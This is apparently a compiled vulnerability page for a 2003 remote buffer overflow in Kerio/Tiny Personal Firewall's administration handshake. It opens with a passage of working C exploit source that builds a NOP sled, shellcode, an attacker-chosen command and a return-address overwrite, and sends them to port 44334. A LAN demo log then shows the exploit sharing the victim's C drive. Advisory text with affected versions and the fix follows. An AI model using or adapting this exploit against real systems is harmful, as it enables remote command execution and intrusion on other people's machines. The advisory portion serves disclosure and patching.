	}

	memset (buffer, 0x90, len);                 /* NOP sled over the whole packet */

	strcpy (p, shellcode);
	lstrcat (p, argv[3]);                       /* the command the shellcode hands to WinExec */
	memcpy (&buffer[200], p, strlen (p) + 1);   /* shellcode + command at offset 200 */

	for (i = 0; i < 2; i++)
		if (!lstrcmpi (argv[1], targ[i].Name)) break;

	if (i > 1)
	{
		printf ("Erreur : la cible %s est inconnue\n", argv[1]);
		ExitProcess (0);
	}

	if (WSAStartup (wVersionRequested, &wsadata))
	{
		printf ("Erreur d'initialisation Winsock\n");
		ExitProcess (0);
	}

	sin.sin_family = AF_INET;
	sin.sin_addr.s_addr = inet_addr (argv[2]);
	sin.sin_port = htons (44334);               /* default KPF administration port */

	memcpy (&buffer[0x1490], targ[i].RetAddr, 4);   /* saved return address slot */

	printf ("Cible : %s\n\n"
		    "Connecting to %s...", targ[i].App, argv[2]);

	sock1 = socket (AF_INET, SOCK_STREAM, 0);
	/* the original also bind()ed the socket to the victim's address before
	 * connecting; that call always failed and was ignored, so it is dropped */
	if ( connect (sock1, (SOCKADDR *)&sin, sizeof (sin)) )
	{
		printf ("connexion failed !\n");
		ExitProcess (0);
	}

	printf ("ok!\n\n"
		    "sending crash for remote execution of '%s'...", argv[3]);

	Sleep (1000);                               /* let the firewall send its handshake banner */
	send (sock1, (const char *)&byte, sizeof (DWORD), 0);   /* length header 00 00 14 94 */
	send (sock1, buffer, len, 0);                           /* then the oversized "key" */

	puts ("ok");
	return 0;
}

/* DEMO ON MY LAN *

D:\code\exploits\kerio>ipconfig

Configuration IP de Windows 2000

Ethernet carte Connexion au réseau local 2 :

        État du media . . . . . . . . . . : Câble Déconnecté

Ethernet carte Connexion au réseau local :

        Suffixe DNS spéc. à la connexion. : ThreaT.lan
        Adresse IP. . . . . . . . . . . . : 10.0.0.1
        Masque de sous-réseau . . . . . . : 255.0.0.0
        Passerelle par défaut . . . . . . : 10.0.0.138

D:\code\exploits\kerio>net view \\10.0.0.3
La liste est vide.


D:\code\exploits\kerio>PFExploit TPF 10.0.0.3 "cmd /c net share c=c:\"
#############################################################
Personal Firewall Engine, Remote buffer overflow Exploit !
#############################################################
Discovered by CORE Security Technologies & Coded by ThreaT
-
ThreaT@Ifrance.com
http://s0h.cc/~threat
-

Cible : Tiny Personal Firewall 2.0.15

Connecting to 10.0.0.3...ok!

sending crash for remote execution of 'cmd /c net share c=c:"'...ok

D:\code\exploits\kerio>net view \\10.0.0.3
Ressources partagées de \\10.0.0.3

Nom          Type         Local    Remarque

-------------------------------------------------------------------------------
c            Disque
La commande s'est terminée correctement.


D:\code\exploits\kerio>

* EOF */

- Vulnerability information (F82995)

Kerio Firewall 2.1.4 Authentication Packet Overflow (PacketStormID:F82995)
2009-11-26 00:00:00
MC  metasploit.com
exploit,overflow
CVE-2003-0220

This Metasploit module exploits a stack overflow in Kerio Personal Firewall administration authentication process. This Metasploit module has only been tested against Kerio Personal Firewall 2 (2.1.4).

(The module source is the same kerio_auth.rb reproduced under EDB 16465 above.)

- Vulnerability information

6294
Kerio Personal Firewall Administrator Authentication Handshake Packet Remote Overflow
Remote / Network Access    Input Manipulation
Loss of Integrity    Upgrade
Exploit Public    Vendor Verified

- Vulnerability description

A remote overflow exists in Kerio Personal Firewall (KPF). The KPF fails to check the boundary of handshake packets in the administration authentication process. By sending a specially crafted request during the handshake process to establish a connection to the administration port, a remote attacker can overflow a buffer and execute arbitrary code on the system with the privileges of the Kerio firewall, resulting in a loss of integrity.

- Timeline

2003-04-28 2003-03-03
2003-04-28 Unknown

- Solution

Upgrade to version 2.1.5 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- Related references

- Vulnerability author

- Vulnerability information

Kerio Personal Firewall Remote Authentication Packet Buffer Overflow Vulnerability
Class: Boundary Condition Error    Bugtraq ID: 7180
Remote: Yes    Local: No
Published: 2003-04-28 12:00:00    Updated: 2007-10-16 06:27:00
The discovery of this vulnerability has been credited to Emiliano Kargieman, Hernán Gips and Javier Burroni from Core Security Technologies. It should be noted that the s0h group has published an unofficial patch to address this issue.

- Affected versions

Kerio Personal Firewall 2 2.1.4
Kerio Personal Firewall 2 2.1.3
Kerio Personal Firewall 2 2.1.2
Kerio Personal Firewall 2 2.1.1
Kerio Personal Firewall 2 2.1

- Unaffected versions

Kerio Personal Firewall 2 2.1.5

- Vulnerability discussion

A buffer-overflow vulnerability has been discovered in Kerio Personal Firewall. The problem occurs during the administration authentication process. An attacker could exploit this vulnerability by forging a malicious packet containing an excessive data size. The application then reads this data into a static memory buffer without first performing sufficient bounds checking.

Successful exploits of this vulnerability may allow an attacker to execute arbitrary commands on a target system, with the privileges of the firewall.

Note that this vulnerability affects Kerio Personal Firewall 2.1.4 and earlier.

- Exploits

CORE has developed a working commercial exploit for their IMPACT product. This exploit is not otherwise publicly available or known to be circulating in the wild.

CORE has released a proof-of-concept python exploit that triggers a denial of service.

An exploit has been made available by Alin-Adrian Anton <aanton@reversedhell.net>

An exploit has been developed by ThreaT of the Skin of Humanity group.

An exploit has been made available as part of the Metasploit Framework project.

- Solution

The vendor has released version 2.1.5 to address this vulnerability.


Kerio Personal Firewall 2 2.1

Kerio Personal Firewall 2 2.1.1

Kerio Personal Firewall 2 2.1.2

Kerio Personal Firewall 2 2.1.3

Kerio Personal Firewall 2 2.1.4

- Related references

 

 
